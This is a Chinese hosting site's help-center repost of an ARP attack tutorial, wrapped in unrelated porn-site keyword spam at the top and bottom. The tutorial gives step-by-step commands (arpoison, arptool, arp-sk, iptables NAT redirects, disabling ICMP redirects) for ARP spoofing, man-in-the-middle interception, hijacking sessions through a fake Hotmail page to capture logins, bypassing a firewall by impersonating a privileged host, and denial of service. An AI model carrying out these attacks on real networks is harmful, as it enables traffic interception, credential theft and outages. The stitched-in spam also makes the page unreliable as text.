老司机91精品网站在线观看-老司机67194免费观看-老司国产精品视频-老熟人老女人国产老太-中文字幕日本在线-中文字幕日本一区久久

始創(chuàng)于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊(cè)有禮 登錄
  • 掛牌上市企業(yè)
  • 60秒人工響應(yīng)
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補(bǔ)償
全部產(chǎn)品
您的位置: 網(wǎng)站首頁(yè) > 幫助中心>文章內(nèi)容

戰(zhàn)術(shù)攻防之近距離搏擊篇(ARP)攻擊(3)

發(fā)布時(shí)間:  2012/7/5 10:09:41
 ◆ARP欺騙行為

雖然MAC泛洪的攻擊方式帶了一些恐慌,但是由于這種方式在很多場(chǎng)合成功概率不高,且這種攻擊方式太過(guò)于激進(jìn),以至于聰明的網(wǎng)管能很快分析網(wǎng)絡(luò)并馬上制止這種行為的擴(kuò)散,因此一種稱之為ARP欺騙的隱蔽的ARP中毒演變攻擊進(jìn)入了Cyber空間。

首先假設(shè)一個(gè)場(chǎng)景:假如主機(jī)A要想獲得主機(jī)B的MAC,它需發(fā)送arp-request數(shù)據(jù)包到廣播地址,主機(jī)B會(huì)以自身地址回應(yīng)這個(gè)請(qǐng)求。但假如主機(jī)C在主機(jī)B之前作出回應(yīng)。主機(jī)A則在其緩存中設(shè)置主機(jī)C的MAC地址。

12:50:31.198300 arp who-has hostB tell hostA   [1]

12:50:31.198631 arp reply hostC is-at 4e:73:02:4b:3f:94  [2]

于是我們構(gòu)造了欺騙行為,但由于主機(jī)A發(fā)送的是廣播包,因此主機(jī)B也會(huì)應(yīng)答:

12:50:31.198862 arp reply hostB is-at 4e:80:51:d1:5e:f5  [3]

那么主機(jī)A的ARP緩存很有可能被刷新,但是由于緩存的無(wú)驗(yàn)證即時(shí)更新機(jī)制,只要主機(jī)C不斷發(fā)送偽造的回應(yīng)包,那么主機(jī)A的緩存列表中就能一直保存主機(jī)C的MAC地址。(假如主機(jī)不發(fā)送arp-request,向其發(fā)送arp-reply并無(wú)太大意思,因?yàn)榫彺娌粫?huì)更新一個(gè)不存在的記錄)。其實(shí)現(xiàn)原理如圖:

了解ARP欺騙的方式后,其準(zhǔn)確定義如下:利用以太和IP協(xié)議之間的交互關(guān)系而形成的攻擊方法,比如,偽造目標(biāo)計(jì)算機(jī)的MAC地址以獲取其控制權(quán)。其表現(xiàn)形式為構(gòu)造虛假arp-request和arp-reply數(shù)據(jù)包以實(shí)現(xiàn)欺騙目的。

這種欺騙方式主要用于交換網(wǎng)絡(luò)結(jié)構(gòu)(對(duì)于HUB結(jié)構(gòu),可以直接對(duì)目標(biāo)主機(jī)進(jìn)行強(qiáng)制控制,使用欺騙方式似乎是種累贅),因此交換網(wǎng)的堅(jiān)固性似乎變的脆弱很多。

使用arpoison小程序可以發(fā)送自定義硬件和IP地址的arp-reply包給目標(biāo)主機(jī),對(duì)其實(shí)行欺騙行為。

[root@hackersvr arpoison]# ./arpoison –I eth0 –d {hostA_ipaddr} –s {hostB_ipaddr} –t 00:13:0E:19:85:03 –r {hostC_mac_addr}ARP packet sent via eth0

# 1、主機(jī)C大量使用自己MAC回應(yīng)主機(jī)A的請(qǐng)求,導(dǎo)致主機(jī)A被蒙騙與主機(jī)進(jìn)行通信。

# 2、假如{- r}參數(shù)所設(shè)置的MAC為一個(gè)不存在的MAC地址,則會(huì)導(dǎo)致主機(jī)B與主機(jī)C之間的TCP

# 會(huì)話臨時(shí)性強(qiáng)行斷開(kāi)。

# 3、假如想更新網(wǎng)絡(luò)中所有主機(jī)系統(tǒng),可以發(fā)送廣播MAC地址FF:FF:FF:FF:FF:FF

◆中間人攻擊(Man In the Middle,MIM)

在ARP方式的攻擊,最有意思的環(huán)節(jié)莫過(guò)于MIM,這種非常隱蔽方式可以在兩臺(tái)通信的計(jì)算機(jī)之間進(jìn)行橋接方式的監(jiān)聽(tīng),并且非常不容易被發(fā)現(xiàn),可謂是偷盜學(xué)術(shù)上的典范運(yùn)用。

攻擊者駁接本地網(wǎng)絡(luò),分別向主機(jī)A和主機(jī)B發(fā)送適當(dāng)?shù)膫卧霢rp-reply包,蒙蔽其所認(rèn)為的正確的通信目標(biāo),并建立轉(zhuǎn)發(fā)規(guī)則,實(shí)現(xiàn)主機(jī)A與主機(jī)B之間的數(shù)據(jù)通信。使數(shù)據(jù)鏈路表面上看似A與B的正常通信,實(shí)則通過(guò)了攻擊者的機(jī)器進(jìn)行代理轉(zhuǎn)發(fā)。

采用arptool可以輕松實(shí)現(xiàn)這類入侵方式:

arptool用法: arptool

用于發(fā)送數(shù)據(jù)包的網(wǎng)卡

發(fā)送的ARP類型包

tell    arp-reply類型數(shù)據(jù)包

bcast   當(dāng)攻擊對(duì)象是linux操作系統(tǒng),可使用此參數(shù)代替tell

/        目標(biāo)IP/MAC地址對(duì)

/        源IP/MAC地址對(duì)

1、分別對(duì)主機(jī)A/B實(shí)施ARP攻擊

[root@hackersvr arptool]#ping 192.168.1.1

[root@hackersvr arptool]#ping 192.168.1.2

[root@hackersvr arptool]#arp –a

?(192.168.1.1) at 01.01.01.01.01.01 [ether] on eth0

?(192.168.1.2) at 02.02.02.02.02.02 [ether] on eth0

[root@hackersvr arptool]# ./arptool eth0 tell 192.168.1.1 01:01:01:01:01:01 192.168.1.2 03:03:03:03:03:03

[root@hackersvr arptool]#./arptool eth0 tell 192.168.1.2 02:02:02:02:02:02 192.168.1.1 03:03:03:03:03:03

現(xiàn)在我們可以透明代理主機(jī)A/B之間的應(yīng)用程序數(shù)據(jù)通信?,比如攻擊者可以修改主機(jī)A/B之間的HTTP事務(wù)提交,但這需要我們?cè)谄溟g建立橋接轉(zhuǎn)發(fā)關(guān)系。

2、橋接主機(jī)A/B之間通信

[root@hackersvr arptool]#e cho 1 > /proc/sys/net/ipv4/ip_forward

[root@hackersvr arptool]#iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2

-d 192.168.1.1 --dport 80 -j REDIRECT --to-port 80

通過(guò)這種方式,我們可以監(jiān)聽(tīng)、修改、切斷和劫持主機(jī)A/B之間的任何應(yīng)用通信數(shù)據(jù),似乎整個(gè)網(wǎng)絡(luò)陷落在一種前所未有的慌亂之中。

知識(shí)組合攻擊

arp-sk在arp方式攻擊中,享有“瑞士軍刀”的美譽(yù),它可以維護(hù)所有設(shè)備的ARP表。通過(guò)發(fā)送適合的ARP數(shù)據(jù)包,它可以實(shí)現(xiàn)ARP的所有類型攻擊,非常強(qiáng)悍的工具。本節(jié)將采用arp-sk講解會(huì)話劫持、偷越防火墻和拒絕服務(wù)攻擊的思維方式。

1、 代理會(huì)話劫持(hijacking)

攻擊者架設(shè)HTTP服務(wù)器模擬遠(yuǎn)程網(wǎng)站的一部分站點(diǎn)(這部分網(wǎng)頁(yè)用于劫持主機(jī)B客戶輸入相關(guān)信息,例如用戶名或ID)。而不需要模擬的站點(diǎn)則代理轉(zhuǎn)發(fā)至真實(shí)站點(diǎn),這種高超的詐騙技巧非常 隱蔽。當(dāng)我們盡情享受網(wǎng)絡(luò)沖浪的愉快時(shí),誰(shuí)會(huì)想到這是個(gè)陷阱?

發(fā)送arp-reply分別攻擊防火墻和目標(biāo)主機(jī)

[root@hackersvr arp-sk]# ./arp-sk -r -d 192.168.1.2 -S 192.168.1.4 -D 192.168.1.2

+ Running mode "reply"

+ IfName: eth0

+ Source MAC: 03:03:03:03:03:03

+ Source ARP MAC: 03:03:03:03:03:03

+ Source ARP IP : 192.168.1.4 (gateway)

+ Target MAC: 02:02:02:02:02:02

+ Target ARP MAC: 02:02:02:02:02:02

+ Target ARP IP : 192.168.1.2 (hostB)

[...]

[root@hackersvr arp-sk]# ./arp-sk -r -d 192.168.1.4 -S 192.168.1.2 -D 192.168.1.4

+ Running mode "reply"

+ IfName: eth0

+ Source MAC: 03:03:03:03:03:03

+ Source ARP MAC: 03:03:03:03:03:03

+ Source ARP IP : 192.168.1.4 (hostB)

+ Target MAC: 04:04:04:04:04:04

+ Target ARP MAC: 04:04:04:04:04:04

+ Target ARP IP : 192.168.1.4 (gateway)

[...]

# 代理轉(zhuǎn)發(fā)非hotmail(207.68.171.233)的一切站點(diǎn)(攻擊者模擬hotmail站點(diǎn),偽裝提供服務(wù))

[root@hackersvr arp-sk]# iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2 \

-d !207.68.171.233 --dport 80 -j REDIRECT --to-port 80

代理轉(zhuǎn)發(fā)非hotmail(207.68.171.233)的一切站點(diǎn)(攻擊者模擬hotmail站點(diǎn),偽裝提供服務(wù))

[root@hackersvr arp-sk]# iptables -t nat -A PREROUTING -p tcp -s 192.168.1.2 \

-d !207.68.171.233 --dport 80 -j REDIRECT --to-port 80

當(dāng)使用轉(zhuǎn)發(fā)設(shè)置,目標(biāo)主機(jī)使用ping命令可以檢測(cè)到其數(shù)據(jù)包的重定向,因此這里阻擋icmp重 定向的信息。

[root@hackersvr arp-sk]# echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects

OK,剩下的事情就是如何如何使用嗅探工具、數(shù)據(jù)捕獲工具或自行定義的腳本來(lái)觀測(cè)目標(biāo)主機(jī)的# 沖浪行為,并可以掌握他所有一切上網(wǎng)信息,諸如:郵件帳戶、論壇ID等。(這些使用方法超出

本文所論述的arp攻擊行為,不予討論)

2、 偷越防火墻

網(wǎng)絡(luò)權(quán)利的不均衡總?cè)囚[一些自負(fù)的家伙。由于網(wǎng)管的存在和防火墻的規(guī)則的設(shè)置,使得某些具有特權(quán)的計(jì)算機(jī)才能任意的訪問(wèn)整個(gè)互連網(wǎng),這為其它機(jī)器的使用者潛埋下嫉妒和羨慕的心理成分。為了反擊這種權(quán)利不均衡,Arp方式的欺騙訪問(wèn)再一次獲得成功!?

原理圖六中,虛線代表主機(jī)B的正常出網(wǎng)訪問(wèn),通過(guò)Arp攻擊后,攻擊者以主機(jī)B的身份特權(quán)對(duì)互連網(wǎng)進(jìn)行任意訪問(wèn),并分離主機(jī)B的網(wǎng)絡(luò)訪問(wèn),使主機(jī)B網(wǎng)絡(luò)訪問(wèn)正常無(wú)異,防火墻的訪問(wèn)限

制形如虛設(shè)。

只需要對(duì)防火墻進(jìn)行攻擊,不需要對(duì)主機(jī)B實(shí)施攻擊

[root@hackersvr arp-sk]# arp-sk -r -d 192.168.1.4 -S 192.168.1.2 -D 192.168.1.4

使用Linux的Netfilter框架,很容易分離屬于攻擊者網(wǎng)絡(luò)訪問(wèn)流和屬于主機(jī)B的網(wǎng)絡(luò)訪問(wèn)流

[root@hackersvr arp-sk]# iptables -t nat -A POSTROUTING -j SNAT --to 192.168.1.2

一切的完美幾乎就在幾句簡(jiǎn)單的語(yǔ)句之間完成,我想起史蒂文?列維的幾句真言:

1、進(jìn)入(訪問(wèn))計(jì)算機(jī)應(yīng)該是不受限制的和絕對(duì)的;

2、一切信息都應(yīng)該是免費(fèi)的;

3、懷疑權(quán)威,反對(duì)壟斷;

4、任何一個(gè)人都能在計(jì)算機(jī)上創(chuàng)造藝術(shù)和美;

5、計(jì)算機(jī)能夠使生活變得更美好

于是,攻擊在此刻似乎也變的美麗了許多。

3、 拒絕服務(wù)攻擊(DoS)

有了上面學(xué)習(xí)過(guò)程,這里實(shí)現(xiàn)Dos攻擊的方式變的相當(dāng)簡(jiǎn)單,對(duì)于攻擊者所代理轉(zhuǎn)發(fā)的數(shù)據(jù)包進(jìn)行阻塞,從而達(dá)到這種卑劣的目的。(我相當(dāng)反感這種攻擊方式,因此我也非常討厭?cǎi){御它進(jìn)行攻擊的人,因此我希望這類攻擊方式只用于實(shí)驗(yàn)?zāi)康模灰獮E用!)

利用Linux得力的iptables工具,方便實(shí)現(xiàn)數(shù)據(jù)堵塞

[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.1 -j DROP

[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.2 -j DROP

[root@hackersvr arp-sk]# iptables -A FORWARD -s 192.168.1.4 -j DROP

另一種方式是制造一個(gè)Mac”黑洞”,既使用不存在的mac地址使目標(biāo)主機(jī)從網(wǎng)絡(luò)地圖上消失。

如下句法使hostA認(rèn)為hostB已經(jīng)離開(kāi)網(wǎng)絡(luò)了:

[root@hackersvr arp-sk]# arp-sk -r -d hostB -S hostA --rand-arp-hwa-src -D hostB

通過(guò)了解Arp原理,我們發(fā)現(xiàn)這些攻擊方式非常有趣,并且思路簡(jiǎn)單,實(shí)現(xiàn)方法也相當(dāng)容易。但這些小技巧不過(guò)是Arp攻擊的基礎(chǔ)層面,下面的部分將深入討論一些Arp高級(jí)利用技巧,其攻擊思維的精妙之處令我贊嘆不止。


本文出自:億恩科技【www.ypdoo.com.cn】

服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經(jīng)營(yíng)性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經(jīng)營(yíng)性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經(jīng)營(yíng)性ICP/ISP證:贛B2-20080012
  • 服務(wù)器/云主機(jī) 24小時(shí)售后服務(wù)電話:0371-60135900
  • 虛擬主機(jī)/智能建站 24小時(shí)售后服務(wù)電話:0371-60135900
  • 專注服務(wù)器托管17年
    掃掃關(guān)注-微信公眾號(hào)
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權(quán)所有  地址:鄭州市高新區(qū)翠竹街1號(hào)總部企業(yè)基地億恩大廈  法律顧問(wèn):河南亞太人律師事務(wù)所郝建鋒、杜慧月律師   京公網(wǎng)安備41019702002023號(hào)
      0
     
     
     
     

    0371-60135900
    7*24小時(shí)客服服務(wù)熱線

     
     
    成人影视在线观看| 中文字幕97| 久久福利影视| 亚欧乱色一区二区三区| 亚欧视频在线| 91麻豆爱豆果冻天美星空| 欧美国产日韩久久久| 日韩中文字幕在线播放| 99久久精品国产免费| 国产网站免费| 久久精品免视看国产成人2021| 久久国产影视免费精品| 美女免费精品高清毛片在线视 | 精品视频一区二区三区| 美女免费黄网站| 九九干| 韩国三级视频网站| 国产a一级| 九九热国产视频| 国产激情一区二区三区| 精品在线视频播放| 999久久66久6只有精品| 亚洲女初尝黑人巨高清在线观看| 精品久久久久久免费影院| 国产精品自拍在线观看| 韩国毛片免费大片| 国产成人精品影视| 999久久狠狠免费精品| 成人免费高清视频| 精品国产一区二区三区久久久蜜臀| 国产亚洲精品成人a在线| 天天色成人| 久久精品店| 毛片电影网| 国产网站免费| 欧美激情伊人| 国产一区二区精品久久91| a级精品九九九大片免费看| 香蕉视频三级| 欧美电影免费| 日韩av东京社区男人的天堂| 韩国妈妈的朋友在线播放| 久久99中文字幕| 高清一级毛片一本到免费观看| 999久久66久6只有精品| 99久久网站| 国产网站免费观看| 国产不卡福利| 精品国产香蕉伊思人在线又爽又黄| 天堂网中文在线| 成人免费网站视频ww| 青青青草视频在线观看| 日韩中文字幕在线播放| 国产伦理精品| 日韩欧美一二三区| 韩国三级香港三级日本三级la| 黄视频网站在线看| 午夜在线影院| 国产福利免费观看| 久久精品欧美一区二区| 黄色短视频网站| 99久久视频| 九九干| 美女免费精品高清毛片在线视 | 黄视频网站在线看| 欧美国产日韩在线| 国产不卡在线观看视频| 国产不卡高清| 韩国三级视频在线观看| 欧美大片a一级毛片视频| 色综合久久手机在线| 韩国毛片免费大片| 高清一级淫片a级中文字幕| 国产伦精品一区二区三区在线观看| 亚洲第一色在线| 毛片电影网| 日日爽天天| 国产一区二区精品久久91| 成人影视在线观看| 黄视频网站免费看| 久久国产一区二区| 欧美日本免费| 亚洲精品影院| 国产伦久视频免费观看 视频| 日本在线www| 美女被草网站| 精品国产三级a| 在线观看成人网 | 日韩中文字幕一区二区不卡| 欧美激情一区二区三区视频 | 日韩一级黄色大片| 黄视频网站在线观看| 精品视频在线观看视频免费视频| 国产极品白嫩美女在线观看看| 国产一区二区福利久久| 美女被草网站| 日本特黄特黄aaaaa大片| 免费国产一级特黄aa大片在线| 久久久成人网| 成人在免费观看视频国产| 久久国产精品自线拍免费| 成人高清免费| 午夜在线影院| 久草免费在线视频| 黄色短视频网站| 精品在线观看一区| 国产高清视频免费| 精品国产一区二区三区免费 | 久久国产精品只做精品| 美女被草网站| 黄色短视频网站| 国产伦精品一区二区三区在线观看| 免费国产在线观看不卡| 国产a毛片| 999精品视频在线| 成人高清护士在线播放| 久久精品店| 免费一级片在线| 好男人天堂网 久久精品国产这里是免费 国产精品成人一区二区 男人天堂网2021 男人的天堂在线观看 丁香六月综合激情 | 四虎影视久久| 一级女性全黄久久生活片| 日本在线www| 欧美激情一区二区三区视频| 国产伦精品一区二区三区在线观看| 99久久网站| 国产亚洲精品aaa大片| 亚洲第一页色| 欧美a级大片| 美女被草网站| 99久久精品国产国产毛片| 精品视频在线观看免费| 日本特黄一级| 欧美一级视频免费观看| 四虎影视库国产精品一区| 精品在线观看国产| 99久久精品费精品国产一区二区| 韩国三级视频网站| 精品视频一区二区| 欧美激情一区二区三区视频高清| 免费毛片播放| 欧美另类videosbestsex高清 | 香蕉视频久久| 国产成人啪精品| 九九久久国产精品大片| 一级毛片视频播放| 成人在免费观看视频国产| a级黄色毛片免费播放视频| 午夜激情视频在线观看| 国产精品自拍在线| 国产高清在线精品一区二区| 久久久成人网| 国产伦久视频免费观看 视频| 国产成人女人在线视频观看| 亚洲第一色在线| 青青青草影院| 免费国产在线观看| 国产极品白嫩美女在线观看看| 黄色短视频网站| 人人干人人草| 欧美另类videosbestsex高清 | 四虎精品在线观看| 国产伦久视频免费观看视频| 二级片在线观看| 韩国毛片免费| 91麻豆精品国产综合久久久| 国产91精品露脸国语对白| 999久久狠狠免费精品| 精品国产一区二区三区国产馆| 欧美1区| 国产精品自拍亚洲| 成人免费一级纶理片| 国产伦久视频免费观看 视频| 美女免费精品高清毛片在线视 | 免费国产一级特黄aa大片在线| 超级乱淫伦动漫| 亚洲第一页乱| 国产一区免费在线观看| 免费一级生活片| a级毛片免费全部播放| 欧美18性精品| 国产一级生活片| 九九精品影院| 亚洲天堂在线播放| 国产不卡在线看| 九九免费高清在线观看视频| 精品视频在线观看免费| 久久99中文字幕| 久久久久久久男人的天堂| 国产亚洲精品成人a在线| 成人免费观看男女羞羞视频| 九九免费高清在线观看视频| 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 久草免费在线视频| 黄色免费三级| 国产精品自拍在线| 91麻豆精品国产高清在线| 超级乱淫黄漫画免费| 91麻豆高清国产在线播放| 欧美大片a一级毛片视频| 99热精品一区|